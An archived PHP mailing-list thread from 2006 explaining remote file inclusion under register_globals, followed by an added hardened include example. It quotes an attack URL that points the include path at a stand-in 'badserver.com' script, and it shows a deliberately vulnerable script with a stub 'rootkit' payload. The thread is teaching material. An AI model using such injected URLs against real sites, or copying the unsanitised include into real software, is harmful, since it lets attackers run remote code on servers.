Re: Fwd: [PHP] Highjack?
- From: jochem@xxxxxxxxxxxxx (Jochem Maas)
- Date: Tue, 14 Nov 2006 21:23:13 +0100
tedd wrote:
At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
tedd wrote:
> The script will then include
> http://www.badserver.com/badscript.txt?dummy=script.php
I still don't see how "badscript.php" can be uploaded into
example.com's site in the first place
PHP sends a request to badserver.com for badscript.txt, and the content
of the response is included just as if it were the content of a local
file.
Hope that helps.
Chris
Chris;
I'm still confused.
At 7:12 PM +0100 11/13/06, Rory Browne wrote:
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
If example.com is my domain, then how could evil-doer get access to my
site to place "badscript.php" there?
in this hypothetical situation you're a complete moron and you wrote this script:
<?
// lets install their rootkit for them,
// save them having to do it.
if (!isset($path)) $path = 'http://www.badserver.com/badscript.txt?dummy=';
include $path;
?>
and bad script contains:
<?php
function loadRootKit() { /* go */ }
loadRootKit();
?>
of course, in real life you're not that stupid at all - but subtler versions of
such vulns occur all over the place :-/
anyway Chris's site(s) have lots of info on this subject - I recommend reading till
something sticks (at least that's my tactic :-)
.
tedd
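For comparison with the script in the message above, here is a hardened counterpart, added as an example and not code from anyone in the thread: the request value is only ever a key into a fixed allow-list, so a URL never reaches include. PAGES_DIR, the page names and resolve_page() are hypothetical; separately, PHP 5.2.0 and later also provide the allow_url_include ini setting (off by default), which stops include from fetching remote URLs at all.

```php
<?php
// Added example: hardened counterpart to the include in the message above.
// PAGES_DIR, the page names and resolve_page() are hypothetical.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Fixed allow-list: request key => file name on disk.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Map a request value to a local file path, or null if it is not allowed.
function resolve_page($requested): ?string
{
    // Arrays (?path[]=x), URLs and traversal strings are not allow-list keys.
    if (!is_string($requested) || !isset(ALLOWED_PAGES[$requested])) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $file = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    // realpath() returns false when the directory or file does not exist.
    if ($base === false || $file === false) {
        return null;
    }
    // Defence in depth: the resolved path must still sit under PAGES_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs, including the URL quoted in the thread.
    // 'home' resolves only if pages/home.php exists next to this script.
    $samples = ['home', 'http://www.badserver.com/badscript.txt?dummy=', '../../etc/passwd', ['x']];
    foreach ($samples as $in) {
        printf("%s => %s\n", json_encode($in), var_export(resolve_page($in), true));
    }
    exit(0);
}

// Read the value from $_GET explicitly; never depend on register_globals.
$target = resolve_page($_GET['path'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
include $target;
```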